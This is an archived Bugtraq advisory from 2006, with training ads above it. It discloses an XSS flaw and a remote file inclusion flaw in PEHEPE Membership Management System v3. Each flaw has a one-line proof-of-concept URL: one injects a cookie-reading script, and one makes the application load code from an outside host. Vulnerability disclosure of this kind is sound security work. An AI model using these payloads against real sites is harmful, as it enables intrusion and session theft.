Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

PEHEPE Membership Management System Multiple Vulnerabilities

Subject: PEHEPE Membership Management System Multiple Vulnerabilities
Date: 28 Feb 2006 23:08:20 -0000
- Advisory: PEHEPE Membership Management System Multiple Vulnerabilities
- Author: Yunus Emre Yilmaz -- mail[at]yunusemreyilmaz(dot)com

- Application: PEHEPE MemberShip Management System 
(http://www.pehepe.org/UYELİK3)
- Affected Version : v3 ( maybe older versions..)
- Risk : Critical

-- Details[0] : XSS Vulnerability
   An attacker can manupulate the value of $kul_adi, if s/he opens sol_menu.php 
directly.
Sol_menu.php is an included page, but the attacker can access it directly. So, 
the value of $kul_adi 
can be changed from the address bar.

-- Proof of Concept:
http://target_site/script_path/sol_menu.php?kuladi=";><script>alert(document.cookie)</script>

-- Details[1] :Remote Code Execution Vulnerability
 There is a "require" command in sol_menu.php. The attacker can bypass the 
constant UYE_SEVIYE using a , querystring like "misafir[]=UYE_SEVIYE". So the 
remote code is executing. As a result, the attacker can change the value of the 
first parameter of the require function which is named as uye_klasor.(dir for 
remote url)

-- Proof Of Concept:
sol_menu.php?uye_klasor=http://www.example.org&misafir[]=UYE_SEVIYE

-- Note : For using these vulnerabilities, register_globals must be on.

Original URL : 
http://yns.zaxaz.com/2006/02/28/pehepe-membership-management-system-multiple-vulnerabilities/

 

<Prev in Thread] Current Thread [Next in Thread>
  • PEHEPE Membership Management System Multiple Vulnerabilities, mail <=